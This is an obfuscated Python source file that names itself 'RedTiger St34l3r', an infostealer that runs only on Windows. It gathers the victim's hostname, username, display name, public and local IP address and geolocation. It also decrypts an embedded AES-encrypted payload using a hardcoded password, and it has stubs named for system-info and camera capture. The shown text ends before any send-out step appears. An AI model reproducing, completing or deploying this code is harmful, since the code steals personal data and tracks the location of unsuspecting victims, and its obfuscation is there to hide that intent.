
import sys

def EJXVFMHLVJZFDYSJFHIIPWLRJWJHTDXFOPZYRZDBIFXOIZKMFUDDKIFEQEOPHPOFUY():
    def JLDZRHNVXIEHMPLPLFBPVPXUVARZMIYEVOOQMFFXQLZMTMBEALPNJYCTBGNBDQIJCBNERMGLSOAAKFTMSZCHWXOBTAJVCB():
        if sys.platform.startswith("win"):
            return False
        else:
            return True
    
    try: 
        XVWGKXVBCUVKUHDHWAHQDIZRQZQOOLRALWTNXNUZEKDDQLKNAPNPIQUSSJDUAFNMREQCLCZERFSHNAOBHLXZBCX = JLDZRHNVXIEHMPLPLFBPVPXUVARZMIYEVOOQMFFXQLZMTMBEALPNJYCTBGNBDQIJCBNERMGLSOAAKFTMSZCHWXOBTAJVCB()
        if XVWGKXVBCUVKUHDHWAHQDIZRQZQOOLRALWTNXNUZEKDDQLKNAPNPIQUSSJDUAFNMREQCLCZERFSHNAOBHLXZBCX == True:
            return XVWGKXVBCUVKUHDHWAHQDIZRQZQOOLRALWTNXNUZEKDDQLKNAPNPIQUSSJDUAFNMREQCLCZERFSHNAOBHLXZBCX
    except:
        return True
    
if EJXVFMHLVJZFDYSJFHIIPWLRJWJHTDXFOPZYRZDBIFXOIZKMFUDDKIFEQEOPHPOFUY() == True:
    sys.exit()
    
import os
import socket
import win32api
import requests
import base64
import ctypes
import threading
import discord
import zipfile
import io
from json import loads
from urllib.request import urlopen
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.backends import default_backend

def QZDVYNJVUBGAVSWJOCQUDYUHWNNJDYJNRLKLEOKHYLTCJOPZYHHFRFP(PDANVHDKUSTMEXEGGQJCZVDJQCUEWAKDEIFWYRMIFOQUMTKZGTGQVXJZIQYOFFJFEGGZHPIZEXXRORUBWHMSJAHFPPF): 
    XVWGKXVBCUVKUHDHWAHQDIZRQZQOOLRALWTNXNUZEKDDQLKNAPNPIQUSSJDUAFNMREQCLCZERFSHNAOBHLXZBCX_system_info = None
    return XVWGKXVBCUVKUHDHWAHQDIZRQZQOOLRALWTNXNUZEKDDQLKNAPNPIQUSSJDUAFNMREQCLCZERFSHNAOBHLXZBCX_system_info

def ZKWPBOSRKMFFTIPAHDXCYNWDMSNNUHLJXIAAOMDGVZXDLGSKAHEQHLLCGJYMDZHETVHEJPX(PDANVHDKUSTMEXEGGQJCZVDJQCUEWAKDEIFWYRMIFOQUMTKZGTGQVXJZIQYOFFJFEGGZHPIZEXXRORUBWHMSJAHFPPF):
    CJHYOYEAGHMYFNYRMQNIMMMLJZNQQIDYVDEIMLCSYEALYRTCARFQFCTFPCZADZQWUUMHCSGGHGDGCWWLAUJXSSXRQKDHHVDL = None
    return CJHYOYEAGHMYFNYRMQNIMMMLJZNQQIDYVDEIMLCSYEALYRTCARFQFCTFPCZADZQWUUMHCSGGHGDGCWWLAUJXSSXRQKDHHVDL

def NQVTLQYTQPHRXWIWPQFXFCQRJPEFLCFXCAYKCHOLEKQROXXWENLMBOBVZLSGKBDZAPFFWWYEODLVKJXVFGBXEAOYSGZPTG(PDANVHDKUSTMEXEGGQJCZVDJQCUEWAKDEIFWYRMIFOQUMTKZGTGQVXJZIQYOFFJFEGGZHPIZEXXRORUBWHMSJAHFPPF):
    MOSIXTOUFTPIQXKVFQOLRMSEDFCSVFFEGBCZPMJNCFDYCXGSOVVUDKHULZSJQTNZGUCYGM = None
    return MOSIXTOUFTPIQXKVFQOLRMSEDFCSVFFEGBCZPMJNCFDYCXGSOVVUDKHULZSJQTNZGUCYGM

def CXWLMDGTDMHRKHGWXMNTHHZYXEHUBLEPFWIFRSMBYBOCFXUPVBUMNUSHKB(): 
    FRYEXBRJZQAMUTSCTCZSFDTSPHYEZJYRFZLFAODTZMGHRNRRLRJBFZTRTGZSVLNGGDMANOYSVGHCNYAZCPKFHVGLJSE = None
    return FRYEXBRJZQAMUTSCTCZSFDTSPHYEZJYRFZLFAODTZMGHRNRRLRJBFZTRTGZSVLNGGDMANOYSVGHCNYAZCPKFHVGLJSE

def SOSSPMMEUDJTNJUJQYOCPXQFGXZKJZVWDWASPZDDVGRXVZMNFIXMFXNJGWUTOYXA(PDANVHDKUSTMEXEGGQJCZVDJQCUEWAKDEIFWYRMIFOQUMTKZGTGQVXJZIQYOFFJFEGGZHPIZEXXRORUBWHMSJAHFPPF): 
    BQUSAXGFXWKYKTVTEBPQROMBYHREIZUMDSCLFZXALHYPHTIHBZAZMAUHBQHNDANHNRQGA = None
    MIZFTBKORIHFPCDLXHMSAKRMWLIXUMPVJQPLJLJACYLORQLQEGQKGMIKOPCCNXAWCZCBKINMYMZCUKFUDXUQHOAATTISMH = None
    IHIVKPSDAWAPWJRCSMBATYJGGIFMQHCAYMGLOIEMDVPMYVWSETRHWUQOHMLRODPLDOWTMYJSRCYICJOJAVVUONT = None
    XUGLWSFRIIZTFPJXPCEIXFZMTWWXKEUMFVJVYIAIBESAGCBAXIVKWQNRRAFKIUSRNJLHMFCLKSCIT = None
    NHMFTBRHGDIPFDYAMZGDWZTUJYCDTOCGMYRVPOZVJJHNVUGMKVRXEXNIBNVLXGSOSNRGZHSSKRQQUNZPKXGZIHAEQTMMHDYJ = None
    JBBCNZWAZITTKUCURBEYTVHLLDDOQLUVWGVCNDJESOEIMOWKVOIBLVAK = None
    return BQUSAXGFXWKYKTVTEBPQROMBYHREIZUMDSCLFZXALHYPHTIHBZAZMAUHBQHNDANHNRQGA, MIZFTBKORIHFPCDLXHMSAKRMWLIXUMPVJQPLJLJACYLORQLQEGQKGMIKOPCCNXAWCZCBKINMYMZCUKFUDXUQHOAATTISMH, IHIVKPSDAWAPWJRCSMBATYJGGIFMQHCAYMGLOIEMDVPMYVWSETRHWUQOHMLRODPLDOWTMYJSRCYICJOJAVVUONT, XUGLWSFRIIZTFPJXPCEIXFZMTWWXKEUMFVJVYIAIBESAGCBAXIVKWQNRRAFKIUSRNJLHMFCLKSCIT, NHMFTBRHGDIPFDYAMZGDWZTUJYCDTOCGMYRVPOZVJJHNVUGMKVRXEXNIBNVLXGSOSNRGZHSSKRQQUNZPKXGZIHAEQTMMHDYJ, JBBCNZWAZITTKUCURBEYTVHLLDDOQLUVWGVCNDJESOEIMOWKVOIBLVAK

def YARLGLFMBODOPYCZHMSXBVJZPUKAPWLATAXOGBINVGMDYPEKLDYWYJMAOAOSPNLPWOQFPYWDLDWWYBESKLSJXQWWWN(PDANVHDKUSTMEXEGGQJCZVDJQCUEWAKDEIFWYRMIFOQUMTKZGTGQVXJZIQYOFFJFEGGZHPIZEXXRORUBWHMSJAHFPPF):
    AFEEGUGCNLXEZJLNNQQCXYSWAWWQVQJRNCGOYQFNUNPZJPTLIVLLKOTZIRFXIPXIGYMSQQJMQERXDIPXZQABGJ = None
    AXPEVVQTPAIVPYSPVXQFYRBVLWLDQOPOZJZQARQDUTOKRWXPMXJRHJJAFHTSGZGED = None
    LZHCWXPSSMIDCPJEOGOXKKMCWPPAEYJCOUIXTBNFIZRBJRPRKMJNCXALAHOSBVXWUSVMKTLOYVPBWEASOEUCWMMTTNDML = None
    return AFEEGUGCNLXEZJLNNQQCXYSWAWWQVQJRNCGOYQFNUNPZJPTLIVLLKOTZIRFXIPXIGYMSQQJMQERXDIPXZQABGJ, AXPEVVQTPAIVPYSPVXQFYRBVLWLDQOPOZJZQARQDUTOKRWXPMXJRHJJAFHTSGZGED, LZHCWXPSSMIDCPJEOGOXKKMCWPPAEYJCOUIXTBNFIZRBJRPRKMJNCXALAHOSBVXWUSVMKTLOYVPBWEASOEUCWMMTTNDML

def HFRWMGFEPVAENMVJUFXMPEJXVBXCGETNWFVVNLTPUARNURYEEQNPNIXAJLBVHCQONLFGEFTZOXYEMBSYJI(PDANVHDKUSTMEXEGGQJCZVDJQCUEWAKDEIFWYRMIFOQUMTKZGTGQVXJZIQYOFFJFEGGZHPIZEXXRORUBWHMSJAHFPPF):
    LRLJOIYTPAJDFAZWOWQFETZFEPHYSDBCFYVCNTSGNAXNYSKLPSLDLGELXUOKLFRGJKDQJDNMLABOVESIYOQHK = None
    return LRLJOIYTPAJDFAZWOWQFETZFEPHYSDBCFYVCNTSGNAXNYSKLPSLDLGELXUOKLFRGJKDQJDNMLABOVESIYOQHK

def QINAJUDPJVOBVUSQTBJIZABJIRCAQYGYWHJPMMZVBZZBEPXPDOHXIEHRDMIIXZKJGTVKUNWYWXMJAKAWVGVT(PDANVHDKUSTMEXEGGQJCZVDJQCUEWAKDEIFWYRMIFOQUMTKZGTGQVXJZIQYOFFJFEGGZHPIZEXXRORUBWHMSJAHFPPF):
    XVWGKXVBCUVKUHDHWAHQDIZRQZQOOLRALWTNXNUZEKDDQLKNAPNPIQUSSJDUAFNMREQCLCZERFSHNAOBHLXZBCX_camera_capture = None
    return XVWGKXVBCUVKUHDHWAHQDIZRQZQOOLRALWTNXNUZEKDDQLKNAPNPIQUSSJDUAFNMREQCLCZERFSHNAOBHLXZBCX_camera_capture

def RBTBMGOPRIPNYKRQYMZIVRPWDMRGEKGKIWYUFWGKYHACRULOSAVDYHMHTQVKYNGGVJWOHENMBRZZUNVN(PDANVHDKUSTMEXEGGQJCZVDJQCUEWAKDEIFWYRMIFOQUMTKZGTGQVXJZIQYOFFJFEGGZHPIZEXXRORUBWHMSJAHFPPF): 
    UJBTEOJLYCZPBAJGMXFTTATRSCGIQIFBPZJRYAVSTPRKONLPPIBTDNLZTSS = None
    return UJBTEOJLYCZPBAJGMXFTTATRSCGIQIFBPZJRYAVSTPRKONLPPIBTDNLZTSS

def DITZDVPFUBNKOIFYFGCKQROPKLLSVNARJJNAHJXZQRDKQUGQUFCDLRYBNVBCXUZBMBIRAFDZKUNQYXWBLTJRKZHBYY(): pass
def EVQPLQNJUWCDELVRYWZSQXKNZXKSRJLNDTBGYKSGSFMCUGSEFIGFDPPTXYFGBEYPENJ(): pass
def PALLVOPDYWHYMQPTTZTBFQGVVVMOLHQTCDVZCEIZVECTKBTQJLKDWVSZKAOUGIVPKDZLWJUXHCTYLJJACXDMVJSNVJU(): pass
def GCHEFZILCMFIJLBAYOUGEEIEXFPCWYOMAJDUUAZQUZTOGCSOHAKXNWMQMMAMDYGJMIZLDBNYZXFDASKKDROWKC(): pass
def UTDTZICFJGHKWOQMNJVEQNSGWCZSIHRJIIINYNXBYBXTHJXQDIIQROXCYCERBZEXBNCFBC(): pass
def BAEIPQTZSVLRMEBAEODVHBOVIHTGRJPUBYRJSHXOPXQGLXXYPLNOEBWSANFLRUNAUHMTPSWIJTLRIQTLHCIOBHLSHN(): pass
def KPOMPZMWRWZTMVIAQWIIJGKHNWRZKEUZTHRDBFQXTVGJVDDAHKNXYTRNIVQXMVWPIECUZACTGZCHUXJ(): pass
def LBFDEKUIVQHQPVDKDTMOELWSIZPUHEOHUTFIYEIXAUXLJWMHGQZUN(): pass
def PPUURZEAIHUMXKOPTFVWGXQPAWLOYQETVZMXAGCNUFUFJENHWTH(): pass
def GBFTPYTJXHZBXRKGHFFTQZITWYCUIQKMAHSZZJAFUTFGCQUNBXNJNLJVVDTFVLDVEPKAARXKLXWOCXXQOOJGLDZTUBFQI(): pass
def MUHORADBYXXIZBTKQDAIDMZHDZCWEGCMDZWPXRZNPAWOCPJVBNGXLCDDUGKNWZZXKQQQCYHJQQQZGJKUUZQZNNAXWVPVNDCRSWR(): pass
def RNWMIPAOCDCAAAZFJDCQNHTFMAXSNFXUPWTZAVLQIDJVSPBXLUYDH(): pass

def YHOCNXGYDWOTWFIXPDSUTYQTPLWACTQKEUZHPKWFUMOKMHXNURXYTKEKMYEYXMIWIYCYQOERO(title):
    try:
        if sys.platform.startswith("win"):
            ctypes.windll.kernel32.SetConsoleTitleW(title)
        elif sys.platform.startswith("linux"):
            sys.stdout.write(f"\x1b]2;{title}\x07")
    except:
        pass
        
def BRQWBCJXYUZFSRNYHCDHFLZOVZKFDURGFNGBAWQRPUANOZHBTJCISPVKQ():
    try:
        if sys.platform.startswith("win"):
            os.system("cls")
        elif sys.platform.startswith("linux"):
            os.system("clear")
    except:
        pass

def BEOQLFEJHCTKXHOXXAJDZJFKJMPSWIOFFFKRNXNNRXRTEEPDXDFGFLWWMQPBGGPJFSVILXPTAYXMMN(GCPOWERLHPGCGMFBWCGCQRMKZOYIPUATLIYLRGPYNORNFEDOZFDHTJYDABHJNPXKADBJZFYLBEQLVJZCUCCTSJAHO, HOLOVUQAUKWBZEUDCWORNSFZPNTSHOTQVVEQQOEGGRTNOVDWGFYPJLHUDDWAZRXTDBAH):
    def VMGYLSSSTNBQGWXUXKONIYMKPPFMUZPEAJPQZMCABDJHQSOQQXOJTROXZCFXQNIJUFIOQC(TEPBQHAMBTFAPAUQDBSIRLKDMUREJAIMAQYAOVTEIFFQUWSVQKAVINROIBKSQKXKIXEEAOE, ZCBICUNZZSMPFXMEMSLDCBWZWMOTMDMRJEDAPKXSSJEHEMQJCTNCFDNZVLVEVPURXEJRYJOEMULQOMUSVBLYXWHHGKCIQLGQK):
        JJDIFBJSYOSKCDRMRAIOIIHFXVYNSTYNOFUSZZNJNHSXQTNTTDGHVNAXYXUPOVLEKXEKMGFLSFNXZWOMWGXNGJ = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32, salt=ZCBICUNZZSMPFXMEMSLDCBWZWMOTMDMRJEDAPKXSSJEHEMQJCTNCFDNZVLVEVPURXEJRYJOEMULQOMUSVBLYXWHHGKCIQLGQK, iterations=100000, backend=default_backend())
        if isinstance(TEPBQHAMBTFAPAUQDBSIRLKDMUREJAIMAQYAOVTEIFFQUWSVQKAVINROIBKSQKXKIXEEAOE, str):  
            TEPBQHAMBTFAPAUQDBSIRLKDMUREJAIMAQYAOVTEIFFQUWSVQKAVINROIBKSQKXKIXEEAOE = TEPBQHAMBTFAPAUQDBSIRLKDMUREJAIMAQYAOVTEIFFQUWSVQKAVINROIBKSQKXKIXEEAOE.encode()  
        return JJDIFBJSYOSKCDRMRAIOIIHFXVYNSTYNOFUSZZNJNHSXQTNTTDGHVNAXYXUPOVLEKXEKMGFLSFNXZWOMWGXNGJ.derive(TEPBQHAMBTFAPAUQDBSIRLKDMUREJAIMAQYAOVTEIFFQUWSVQKAVINROIBKSQKXKIXEEAOE)

    GCPOWERLHPGCGMFBWCGCQRMKZOYIPUATLIYLRGPYNORNFEDOZFDHTJYDABHJNPXKADBJZFYLBEQLVJZCUCCTSJAHO_data = base64.b64decode(GCPOWERLHPGCGMFBWCGCQRMKZOYIPUATLIYLRGPYNORNFEDOZFDHTJYDABHJNPXKADBJZFYLBEQLVJZCUCCTSJAHO)
    ZCBICUNZZSMPFXMEMSLDCBWZWMOTMDMRJEDAPKXSSJEHEMQJCTNCFDNZVLVEVPURXEJRYJOEMULQOMUSVBLYXWHHGKCIQLGQK = GCPOWERLHPGCGMFBWCGCQRMKZOYIPUATLIYLRGPYNORNFEDOZFDHTJYDABHJNPXKADBJZFYLBEQLVJZCUCCTSJAHO_data[:16]
    ZVTKCVXXRNZRQINEDDPGMVREFYALOXREIURMMRJUDLYXTTCOPHVSSIRRETRLDUF = GCPOWERLHPGCGMFBWCGCQRMKZOYIPUATLIYLRGPYNORNFEDOZFDHTJYDABHJNPXKADBJZFYLBEQLVJZCUCCTSJAHO_data[16:32]
    GCPOWERLHPGCGMFBWCGCQRMKZOYIPUATLIYLRGPYNORNFEDOZFDHTJYDABHJNPXKADBJZFYLBEQLVJZCUCCTSJAHO_data = GCPOWERLHPGCGMFBWCGCQRMKZOYIPUATLIYLRGPYNORNFEDOZFDHTJYDABHJNPXKADBJZFYLBEQLVJZCUCCTSJAHO_data[32:]
    LRBXSOBZQRQSVANOXCBYQXEDEOORUMPVYQMFOMXJZNYYBOCHPLSG = VMGYLSSSTNBQGWXUXKONIYMKPPFMUZPEAJPQZMCABDJHQSOQQXOJTROXZCFXQNIJUFIOQC(HOLOVUQAUKWBZEUDCWORNSFZPNTSHOTQVVEQQOEGGRTNOVDWGFYPJLHUDDWAZRXTDBAH, ZCBICUNZZSMPFXMEMSLDCBWZWMOTMDMRJEDAPKXSSJEHEMQJCTNCFDNZVLVEVPURXEJRYJOEMULQOMUSVBLYXWHHGKCIQLGQK)
    AXJBQWBJKKPSOHPPVDEAKPPPCBFLZBPDSUVVIVTLFXYNBQQBUR = Cipher(algorithms.AES(LRBXSOBZQRQSVANOXCBYQXEDEOORUMPVYQMFOMXJZNYYBOCHPLSG), modes.CBC(ZVTKCVXXRNZRQINEDDPGMVREFYALOXREIURMMRJUDLYXTTCOPHVSSIRRETRLDUF), backend=default_backend())
    IVJAIOBJAEAVHDGUZEPNCEQWKGLBBADCYXTEVFJJXPHWLTKATXRDEZZXYYFEOZFMEWMHXUIVXHCSSQZBNNLQ = AXJBQWBJKKPSOHPPVDEAKPPPCBFLZBPDSUVVIVTLFXYNBQQBUR.decryptor()
    AUMJHQCTHDHBSSEFHBONZOZLUBGCKQIRRKSJKKHXIGKMHEEQNOIFQAFMAVHOKANPHOVJVYAJTCQXWNUK = IVJAIOBJAEAVHDGUZEPNCEQWKGLBBADCYXTEVFJJXPHWLTKATXRDEZZXYYFEOZFMEWMHXUIVXHCSSQZBNNLQ.update(GCPOWERLHPGCGMFBWCGCQRMKZOYIPUATLIYLRGPYNORNFEDOZFDHTJYDABHJNPXKADBJZFYLBEQLVJZCUCCTSJAHO_data) + IVJAIOBJAEAVHDGUZEPNCEQWKGLBBADCYXTEVFJJXPHWLTKATXRDEZZXYYFEOZFMEWMHXUIVXHCSSQZBNNLQ.finalize()
    DOIUJNHGAFAOVZSWCMGISPIMNVVLIXWDQVEUHNOYUXKLEAFYUXMAIZEBOROUKMYFPHQLMSKBQOANUUQXNIUQR = padding.PKCS7(128).unpadder()
    KIRDKMBIKSPXRFXRHOFSGMZZTCENZSNZVBYDQULDHRYWIFSNVLCZPWVZKGVIBAPR = DOIUJNHGAFAOVZSWCMGISPIMNVVLIXWDQVEUHNOYUXKLEAFYUXMAIZEBOROUKMYFPHQLMSKBQOANUUQXNIUQR.update(AUMJHQCTHDHBSSEFHBONZOZLUBGCKQIRRKSJKKHXIGKMHEEQNOIFQAFMAVHOKANPHOVJVYAJTCQXWNUK) + DOIUJNHGAFAOVZSWCMGISPIMNVVLIXWDQVEUHNOYUXKLEAFYUXMAIZEBOROUKMYFPHQLMSKBQOANUUQXNIUQR.finalize()
    return KIRDKMBIKSPXRFXRHOFSGMZZTCENZSNZVBYDQULDHRYWIFSNVLCZPWVZKGVIBAPR.decode()

YHOCNXGYDWOTWFIXPDSUTYQTPLWACTQKEUZHPKWFUMOKMHXNURXYTKEKMYEYXMIWIYCYQOERO("")

try: WVQMJRGMABILADTYKHWPLQNKUVZSITQVRQNNBSGJGPCTTLSPKPXXFCHPDDGVQFCSCYLGZKTWEDMKCJQQWXKMI    = socket.gethostname()
except: WVQMJRGMABILADTYKHWPLQNKUVZSITQVRQNNBSGJGPCTTLSPKPXXFCHPDDGVQFCSCYLGZKTWEDMKCJQQWXKMI = "None"

try: DMMOPUYEEXWJVPYKMTRQCTSTCJKOCJYRVLVHTTNVDBOSOUPSJTBYCOFUKVPZMRTVAWOBQLYIQAOQZWFOTRGOPCPEKGKRLGIAZY    = os.getlogin()
except: DMMOPUYEEXWJVPYKMTRQCTSTCJKOCJYRVLVHTTNVDBOSOUPSJTBYCOFUKVPZMRTVAWOBQLYIQAOQZWFOTRGOPCPEKGKRLGIAZY = "None"

try: FJJCANLPAYLDYZMMUTZLZHCYLNCBYPFAMAMCWWSXSGKQRNWMWUKYTHIBEICPRGEAVFZMPXSWOYGZLIRHL    = win32api.GetUserNameEx(win32api.NameDisplay)
except: FJJCANLPAYLDYZMMUTZLZHCYLNCBYPFAMAMCWWSXSGKQRNWMWUKYTHIBEICPRGEAVFZMPXSWOYGZLIRHL = "None"

try: MXAHHHFNPRGVFHUCAVPSUXDSBKPLHUYFPMHRVSDWQXFSVUYYGOFXITWTIEJTPVYPQKNCKBINTAOBL    = requests.get("https://api.ipify.org?format=json").json().get("ip", "None")
except: MXAHHHFNPRGVFHUCAVPSUXDSBKPLHUYFPMHRVSDWQXFSVUYYGOFXITWTIEJTPVYPQKNCKBINTAOBL = "None"

try: OOLRSGSTTHIBAEMCZAASWXBBZLJUABLBZXCXOUQMREVRUXIGTPPUJLYSYH    = socket.gethostbyname(socket.gethostname())
except: OOLRSGSTTHIBAEMCZAASWXBBZLJUABLBZXCXOUQMREVRUXIGTPPUJLYSYH = "None"

THJYZOXIBGIZJOPIKSMLRNYNWHKVFKMIYPCXUTTSZZAYGURVSYGPNSIRIHPNZRGZ = r"""
wSFEcHzE13xY7NPeJ3e0AY39TxUMYpY3mOPt2D4t8Ke6o7GWWKKXcyy4HuvPEewJNgiw3KnD7TWuoC4XJ7TEbu2EWSsEdOWqyljzx2+GGA2J7AWKahcDrj3ZeyseeMDR1wiWhdls6HW+aBsCOmRQB4hDmHi8Ux5C1YVklWBjpQSZmlph1N7ARHkphipVZxftA6uTO5I1Wrd+Zu3h0ugRrQ==
"""

PFALVPCDMTVYSYCMARZJKCDDNELJTVPLFPUPHKUPPWRTOAKWQXXIYUKDJRSSUQDGMUJKHZKQZ            = "hGNxeoFLRYdpuZaFvNjqlsCAtBigcQDNYjYVEWtfFyYJzErfboNIMcWzFMTWxaFfvhabjclIKwoELKRAWOKuAQCmrAWbqCWhxixJefizGSCXGHgwRIVkNM"
IYMJMPFPMDQQWMBBQGJYQTLWXYOMZCXLBLGXABINPUVIOYOXWEEMEEHRKXHOSQXDIONFSRSTABXZLIIIGXEBYMEKOYNDCOBDMRCH        = "None"
PMMYUBRNKOSJQJUVQRDJYNETJPTMRKEKXEJTEKEJKNDKPMGQDCZRWWVXLWZZQAENGPICUASSBWXGRFRLXZPSYRAT    = 0xa80505
PSTAPZXLMXZDHWDRSLKOAMBELAGFTQFZIJBXPYPCRYXPYJRCAQ = "RedTiger St34l3r"
IVYCSVVBTOOERBZNHJOCBFXBTZDOWBFWLGIKKFPBYPKITOGKINGRDEJFIYEPSBHHNSEUXLTGIBTDINQJVXFRZKTXEETNEEPIXMC   = "https://google.com"
KBBQUBJGSGXCYVOQLITDWNTZPCJXYEMZTIMJHTYYJCEBQFLNKNAVRNUEWRFGVSDJKUKONEYJQJRNUGJVIKMWCNXPLPUTBIPJZ    = "RedTiger St34l3r - github.com/loxy0dev/RedTiger-Tools"
HNJLCTFDRHCHTBBTORKSKHYMKPHVQISSZRSGPNPOMFZRPSCHZBBKTTDPHGCPRXRCNLWSLLVQEJHRSSXCBTSRYEHEAZUTL   = {"text": KBBQUBJGSGXCYVOQLITDWNTZPCJXYEMZTIMJHTYYJCEBQFLNKNAVRNUEWRFGVSDJKUKONEYJQJRNUGJVIKMWCNXPLPUTBIPJZ, "icon_url": IVYCSVVBTOOERBZNHJOCBFXBTZDOWBFWLGIKKFPBYPKITOGKINGRDEJFIYEPSBHHNSEUXLTGIBTDINQJVXFRZKTXEETNEEPIXMC}
ZOWFKEUKPEXZQASGWKCSIWPMAJAIXLAYRZDSKSUPKSGOKPAVSNAPXDIQMDA    = f'`{DMMOPUYEEXWJVPYKMTRQCTSTCJKOCJYRVLVHTTNVDBOSOUPSJTBYCOFUKVPZMRTVAWOBQLYIQAOQZWFOTRGOPCPEKGKRLGIAZY} "{MXAHHHFNPRGVFHUCAVPSUXDSBKPLHUYFPMHRVSDWQXFSVUYYGOFXITWTIEJTPVYPQKNCKBINTAOBL}"`'
JNECUFARGSKZSYZNLMUSWNESETSJKPFYFDSWRJPEAWRZQELGYKXVGMKZ    = BEOQLFEJHCTKXHOXXAJDZJFKJMPSWIOFFFKRNXNNRXRTEEPDXDFGFLWWMQPBGGPJFSVILXPTAYXMMN(THJYZOXIBGIZJOPIKSMLRNYNWHKVFKMIYPCXUTTSZZAYGURVSYGPNSIRIHPNZRGZ, PFALVPCDMTVYSYCMARZJKCDDNELJTVPLFPUPHKUPPWRTOAKWQXXIYUKDJRSSUQDGMUJKHZKQZ)

WOFVIQBUYMNQHKLWENKUQJDZDROVCCQBJZRVHBAQLZGNZWSDANOOOYJMTCTNATFU           = os.getenv("WINDIR", None)
KRLLNKQKQBYDUBTGZVPYXFMJTMXXINNUPXEMKDLIMAURVKTYXSXIERTIMMXMRGUPNYBKRGAPWZDANI       = os.getenv('USERPROFILE', None)
YFPEHOPNPSAQVKCANRXYIXWDUTFTZWJGEHVYRSHITHRPGIZZJYNUBEZDMQIRMSFEYAOJOYUDJVZRIRDSVEECMEILGN     = os.getenv('LOCALAPPDATA', None)
VUMNXCAKSMMYVIFQFYAERSTJJBJTBEXOZPGVEXEUYHZBUVFBWSQNDKLQLFNPIKZZLRJJBVEAZYCWYNXRCADFOGZJFCCLLA   = os.getenv('APPDATA', None)
UVALGAMPNRRXZRKIPYXSAXSYRGVWKOZLWRVAARHHCOSHZORCEZFH = os.getenv('ProgramFiles(x86)', None)
if UVALGAMPNRRXZRKIPYXSAXSYRGVWKOZLWRVAARHHCOSHZORCEZFH is None:
    UVALGAMPNRRXZRKIPYXSAXSYRGVWKOZLWRVAARHHCOSHZORCEZFH = os.getenv('ProgramFiles', None)

try:
    USMUIEOTTUUTUYZJAPVWARAGVAWIFTNUQEHBJMTXNKHLJOYETMZWDMLBILYDW = requests.get(f"https://{IYMJMPFPMDQQWMBBQGJYQTLWXYOMZCXLBLGXABINPUVIOYOXWEEMEEHRKXHOSQXDIONFSRSTABXZLIIIGXEBYMEKOYNDCOBDMRCH}/api/ip/ip={MXAHHHFNPRGVFHUCAVPSUXDSBKPLHUYFPMHRVSDWQXFSVUYYGOFXITWTIEJTPVYPQKNCKBINTAOBL}")
    RGWOIVTIKTOIUKNXMFGAEESRMPFDXVKBRONQVFZLKTZYSHVHQMACICH = USMUIEOTTUUTUYZJAPVWARAGVAWIFTNUQEHBJMTXNKHLJOYETMZWDMLBILYDW.json()

    LBPUKSYYAHSFYHRMBFKSREEGUJBNZCPTKXYMDJPBKSSENTRTYZFKYKROYRMTESQCBOHJHA = RGWOIVTIKTOIUKNXMFGAEESRMPFDXVKBRONQVFZLKTZYSHVHQMACICH.get('country', "None")
    LBPUKSYYAHSFYHRMBFKSREEGUJBNZCPTKXYMDJPBKSSENTRTYZFKYKROYRMTESQCBOHJHA_code = RGWOIVTIKTOIUKNXMFGAEESRMPFDXVKBRONQVFZLKTZYSHVHQMACICH.get('country_code', "None")
    IMNJQIGDUFLWRCYYUDNCHNXNVXRKIUERAWAQTGVTXPQCYYCAACKGKGGIL = RGWOIVTIKTOIUKNXMFGAEESRMPFDXVKBRONQVFZLKTZYSHVHQMACICH.get('region', "None")
    IMNJQIGDUFLWRCYYUDNCHNXNVXRKIUERAWAQTGVTXPQCYYCAACKGKGGIL_code = RGWOIVTIKTOIUKNXMFGAEESRMPFDXVKBRONQVFZLKTZYSHVHQMACICH.get('region_code', "None")
    ZMNFRKXUIEOWSGEGVIQYMDHFMMBNAGZANSBZPQHNJOJEDWPZNGBIHWSAIWANZNAZOXPKUGGFWTX = RGWOIVTIKTOIUKNXMFGAEESRMPFDXVKBRONQVFZLKTZYSHVHQMACICH.get('zip', "None")
    UBQLUUKHVSVMPDZENHCXHVPKCHKTSQFVVXAYRLMSESMMVXKVLMVTZ = RGWOIVTIKTOIUKNXMFGAEESRMPFDXVKBRONQVFZLKTZYSHVHQMACICH.get('city', "None")
    LHQSWDSBJQHKAWLBZPBCCVSFOFSBIZHOYWEAARSDNITYCCKHHWYKNTUNPRSVTIQRJZGBTVQFCACATQQT = RGWOIVTIKTOIUKNXMFGAEESRMPFDXVKBRONQVFZLKTZYSHVHQMACICH.get('latitude', "None")
    KTWTMQFPHUAIQGONJGXXJVUBPQPKXGOWHNWGKFLKDBMPEXZFHHTWHGSGQMZM = RGWOIVTIKTOIUKNXMFGAEESRMPFDXVKBRONQVFZLKTZYSHVHQMACICH.get('longitude', "None")
    ICIBWHRNSGGKRCQXAWECYHDPYCAIHVRLKUCQPXZUOOINPTDWAD = RGWOIVTIKTOIUKNXMFGAEESRMPFDXVKBRONQVFZLKTZYSHVHQMACICH.get('timezone', "None")
    UIVQRVNUAUEOLYMVYRUAZVKMBZLQYWLKUBIHECJFIOMXRGBVNWDSVKQVQOJPUJHKEYKPLDCZVHRWXPXSHGQDPCWE = RGWOIVTIKTOIUKNXMFGAEESRMPFDXVKBRONQVFZLKTZYSHVHQMACICH.get('isp', "None")
    PQRFOHEEUGTRQFUBGMXXAFLTAOJWXBYJCALGWWAPPLJCOZSHJHBTKQCTXHDZYKCQKUAYEPLUSL = RGWOIVTIKTOIUKNXMFGAEESRMPFDXVKBRONQVFZLKTZYSHVHQMACICH.get('org', "None")
    CJKOWOBQIZNNZMLTMPHGLBSWWJNZMLYZXEBKKCHSIEIQZXXLIDHHPYMWHEQLHEJWSWARAGFQGMDGO = RGWOIVTIKTOIUKNXMFGAEESRMPFDXVKBRONQVFZLKTZYSHVHQMACICH.get('as', "None")
except:
    USMUIEOTTUUTUYZJAPVWARAGVAWIFTNUQEHBJMTXNKHLJOYETMZWDMLBILYDW = requests.get(f"http://ip-api.com/json/{MXAHHHFNPRGVFHUCAVPSUXDSBKPLHUYFPMHRVSDWQXFSVUYYGOFXITWTIEJTPVYPQKNCKBINTAOBL}")
    RGWOIVTIKTOIUKNXMFGAEESRMPFDXVKBRONQVFZLKTZYSHVHQMACICH = USMUIEOTTUUTUYZJAPVWARAGVAWIFTNUQEHBJMTXNKHLJOYETMZWDMLBILYDW.json()

